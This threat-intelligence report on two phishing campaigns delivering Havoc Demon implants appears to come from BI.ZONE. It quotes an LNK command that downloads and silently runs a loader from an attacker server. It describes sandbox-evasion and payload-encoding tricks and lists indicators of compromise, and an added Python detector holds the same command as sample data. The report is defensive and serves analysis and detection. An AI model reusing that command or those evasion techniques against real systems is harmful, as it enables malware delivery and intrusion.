In recent months, adversaries have increasingly opted for the Havoc post-exploitation framework, a tool that is far less widely used than Cobalt Strike, Metasploit, or Sliver. According to BI.ZONE Threat Intelligence, this C2 framework is chosen in an attempt to evade security controls that may not flag a little-known program as malicious. The Mysterious Werewolf cluster took the same approach when it leveraged the Mythic framework in one of its campaigns.
In this research, we explore two campaigns based on the Havoc framework.
Criminals often send out phishing emails on behalf of well-known organizations. To make their messages look plausible and convincing, adversaries eagerly use the names of renowned universities, government regulators, and law enforcement agencies. The names of credible institutions lull the user’s vigilance, prompting them to open malicious emails.
It is important to remember that the organizations whose brands are abused in phishing emails are not liable for the actions of the criminals or for the resulting damage.
Key findings
- Adversaries continue to seek alternatives to custom-built malware, frequently turning to post-exploitation frameworks.
- By using lesser-known tools, attackers increase their chances of bypassing security systems.
- Phishing emails remain the most popular way of gaining initial access, as they offer the broadest attack surface.
Campaign №1
In July, BI.ZONE Threat Intelligence specialists discovered the archive Выписка амбулаторная Камильская.zip containing the ISO file Документы Камильская.iso, which in turn contained the LNK file Камильская А. Г.lnk. The names of the archive and its contents suggested an outpatient medical record and related documents. Opening the LNK file triggered the execution of the following command:
cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe
The command performed the following actions:
- used cURL to download the decoy document from the server 87.242.107[.]147 and saved it on the compromised system as C:\Users\Public\Documents\Vipiska.doc
- used cURL to download OneDriveUpdater.exe from the same server and saved it as C:\Users\Public\Downloads\OneDriveUpdater.exe
- started the downloaded OneDriveUpdater.exe in the background without a visible window (start /min /B)
- opened the decoy Vipiska.doc
- forcibly terminated every cmd.exe process on the host with taskkill /F /IM cmd.exe, including the one running the chain, so that no command shell remained visible to the user
The decoy was an outpatient medical record (fig. 1).
OneDriveUpdater.exe was a PE32 executable written in C# that served as a loader. It contained an encrypted payload, which it decrypted and ran in memory. Although OneDriveUpdater.exe carried a Microsoft OneDrive icon, the file was not digitally signed.
To prepare and run the malicious payload, the loader used the following WinAPI functions:
- VirtualAllocExNuma, to allocate a memory region for the payload (a less common allocation API than VirtualAlloc that some sandboxes and emulators do not implement, which is one reason loaders favor it)
- VirtualProtect, to change the protection of that memory region so the decrypted payload becomes executable
- CreateThread, to run the payload in a new thread within the loader's own process
To obstruct analysis, the loader performed two checks:
- execution time: the loader slept for 3 seconds and terminated if fewer than 2.5 seconds had actually elapsed, a sign that a sandbox was fast-forwarding the sleep
- process name: if the running process was called anything other than OneDriveUpdater, the loader terminated, so a sample renamed to its hash before being detonated in a sandbox does nothing
The loader contained two types of encrypted malicious payload: x86 and x64. Decrypting the payload required a double XOR with 32-byte keys.
The malicious payload was shellcode that launched a dynamic link library with the original name demon.x86.dll or demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant's configuration data is presented in table 1 below.
We also discovered a similar sample of OneDriveUpdater.exe (SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569) with an identical PDB path. This loader also contained a Havoc Demon implant, in this case using 87.242.107[.]224 as the C2 server.
Our analysis of the C2 servers turned up additional malicious files as well as previously unknown components of the C2 infrastructure (all associated indicators of compromise are available on the BI.ZONE Threat Intelligence portal). Among the files was another decoy document, Medical.doc, a nearly exact copy of Vipiska.doc (fig. 2), which confirmed that both documents had been produced by the same adversaries.
Analysis of the metadata suggested that the attackers used data stolen from a medical research center.
Campaign №2
In August, BI.ZONE Threat Intelligence specialists discovered a phishing email (fig. 3).
A link in the body of the email led to hxxp://inforussia[.]org/dokumenty.html, a page containing a malicious payload encoded in Base64 with 35 added to every character of the Base64 string (fig. 4).
Clicking the link resulted in the malicious payload being saved on the compromised system as Dokumenty_FSB.exe. Written in C/C++, this PE32+ executable had a PDF icon and served as a loader. Its RCData resource held the payload encoded as a list of IPv6 addresses separated by CR LF (0D 0A) and XOR-encrypted with a 10,000-byte key. The loader decoded and decrypted the payload in memory and then ran it in a new thread.
As in the previous campaign, the malicious payload was shellcode that launched a dynamic link library with the original name demon.x86.dll or demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant's configuration data is presented in table 2 below.
Indicators of compromise
Выписка амбулаторная Камильская.zip
- MD5: d970b9e0f46675098dbdd3082565c1c0
- SHA-1: 7388f62e8da9cdbcac4f5bc6b0dc41ff8f0056a9
- SHA-256: 88f83a7394c61b0e05432572ccbbacd1878dad0602c5459f98f46c265e63d8c7
Документы Камильская.iso
- MD5: 3273fb8b07627d8bf5aa4d45aa817ba5
- SHA-1: 14a8c1f7dd2ec5ac1faa8050acbb2fcdf7b8ac8c
- SHA-256: 07ae355ebfafe21d81592b765053c48cf4a079d71b359b6a4d7f412b1dfb6374
Камильская А. Г.lnk
- MD5: ac043785536df294f73f89040d4fc767
- SHA-1: f0f6947cca25f01eda399a7fba1c23e11a0c3a15
- SHA-256: 48a579e8e48938f810fd6568e0d5c8ed6b3ec093f3c76a67f9c494224962a334
OneDriveUpdater.exe
- MD5: 31113f00145ab7d3773884f091407bed
- SHA-1: 061d2d06ce1cabde79ee392645c3568df36fdf17
- SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569
OneDriveUpdater.exe
- MD5: 14fa89384daab27b998d53efc1750a38
- SHA-1: 7f7313d8e9d18823a57ac7a329b9695f6fa7b962
- SHA-256: 7e3928a7f3300aedf261db5596cb7f2f6aac115240b010e25a3d53decde38fd0
dokumenty.html
- MD5: 8a21fe665d3f3a0e44f21e3381da067c
- SHA-1: ad6f413709c9e3af885233822a1aebd779bba7bc
- SHA-256: 7c2f59d9790b816cb6f27a796d7c928046519f7429b7d2bbe53c60a7a55e22a7
Dokumenty_FSB.exe
- MD5: f43dd2463e238ec7af4c63df87db6c73
- SHA-1: bb92e0ca7eda4b866af872a4552e4df42bb28aba
- SHA-256: ac301b7698ac040f219eb8dfb248595a406b075d91f51116ef60d4dd9f5242ad
hxxp://inforussia[.]org
87.242.107[.]147
87.242.107[.]224
46.29.162[.]93
MITRE ATT&CK
Campaign №1
Campaign №2
Detection
The examined malicious activity is detected by the following BI.ZONE EDR rules:
win_access_to_ti_observed_host_from_nonbrowsers
win_execution_of_ti_observed_file
win_curl_download_and_execute_file
win_kill_cmd_process
win_suspicious_code_injection_to_system_process
win_possible_parent_process_spoofing
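The rule names above map onto observable features of the LNK command from campaign 1: a curl download into a world-writable path, a start of the file that was just downloaded, and a forced kill of cmd.exe. The script below is an added example of how such logic can be run over process-creation telemetry; it is not BI.ZONE rule code. Its events are constructed (the first reproduces the LNK command quoted in campaign 1, the second is a benign curl use for contrast), and the field names are an assumption modelled on typical process-creation telemetry.

```python
"""Flag the LNK download-and-execute chain in process-creation telemetry.

Added example for this write-up, not BI.ZONE EDR rule code. The events are
constructed; their field names (parent_image, image, command_line) are an
assumption modelled on Sysmon event 1 and common EDR process-creation records.
"""
import re
from dataclasses import dataclass

# hxxp:// is accepted next to http:// so indicators can be pasted from a report as-is.
URL_RE = re.compile(r'\bh(?:tt|xx)ps?://[^\s"&|]+', re.IGNORECASE)
CURL_RE = re.compile(r'(?:^|[\s\\])curl(?:\.exe)?\s', re.IGNORECASE)
OUT_RE = re.compile(r'(?:^|\s)(?:-o|--output)\s+"?([^\s"&|]+)', re.IGNORECASE)
START_RE = re.compile(r'(?:^|\s)start(?:\s+/\w+)*\s+"?([^\s"&|]+)', re.IGNORECASE)
KILL_CMD_RE = re.compile(r'\btaskkill(?:\.exe)?\b(?=.*\s/f\b)(?=.*\s/im\s+cmd\.exe\b)', re.IGNORECASE)
PUBLIC_RE = re.compile(r'^[a-z]:\\users\\public\\', re.IGNORECASE)
HIDDEN_RE = re.compile(r'\s/(?:b|min)\b', re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".msi")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def split_chain(cmd: str) -> list:
    """Split a cmd.exe one-liner on its chaining operators (&&, ||, &, |).

    A URL containing '&' would be cut as well; acceptable for a heuristic.
    """
    return [s.strip() for s in re.split(r"&&|\|\||[&|]", cmd) if s.strip()]


def analyze(ev: ProcEvent) -> list:
    """Return human-readable findings for one process-creation event."""
    findings = []
    downloaded = {}  # lowercase output path -> URL it was fetched from
    for seg in split_chain(ev.command_line):
        url, out = URL_RE.search(seg), OUT_RE.search(seg)
        if CURL_RE.search(seg) and url and out:
            path = out.group(1).lower()
            downloaded[path] = url.group(0)
            if PUBLIC_RE.match(path):
                findings.append(f"curl download into world-writable path {path}")
        started = START_RE.search(seg)
        if started and started.group(1).lower() in downloaded:
            path = started.group(1).lower()
            kind = "executable" if path.endswith(EXEC_EXT) else "document (possible decoy)"
            hidden = " hidden (/B or /min)" if HIDDEN_RE.search(seg) else ""
            findings.append(f"download-and-execute:{hidden} {kind} {path}")
        if KILL_CMD_RE.search(seg):
            findings.append("forced termination of every cmd.exe (taskkill /F /IM cmd.exe)")
    if findings and ev.image.lower().endswith("cmd.exe") and ev.parent_image.lower().endswith("explorer.exe"):
        findings.append("chain runs in cmd.exe under explorer.exe, consistent with a double-clicked LNK")
    return findings


SAMPLE_EVENTS = [  # constructed; the first mirrors the LNK command quoted in campaign 1
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=(
            r"cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc"
            r" && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe"
            r" && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe"
            r" && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe"
        ),
    ),
    ProcEvent(  # benign contrast: a fetch into the user's own profile, nothing started
        parent_image=r"C:\Windows\System32\WindowsTerminal.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r"cmd.exe /c curl https://example.com/report.csv -o C:\Users\alice\report.csv",
    ),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.command_line[:60], "->", analyze(ev) or "no findings")
```

Each finding corresponds to one of the rule families listed above; in an EDR the same features would be scored together rather than alerted on individually, since a lone curl download or a lone taskkill is common in legitimate administration.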
How to protect your company from such threats
Phishing emails are the most popular attack vector against organizations. To protect your mail infrastructure, you can use specialized services that filter unwanted emails. One such service is BI.ZONE CESP. The solution inspects every message and uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis, without slowing down the delivery of legitimate messages.
Studying the current attack methods and tools is important for mapping the cyber threat landscape. To stay aware of the latest campaigns and methods used in attacks against specific infrastructures, we recommend dedicated portals such as BI.ZONE Threat Intelligence. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect from the most critical threats to the company.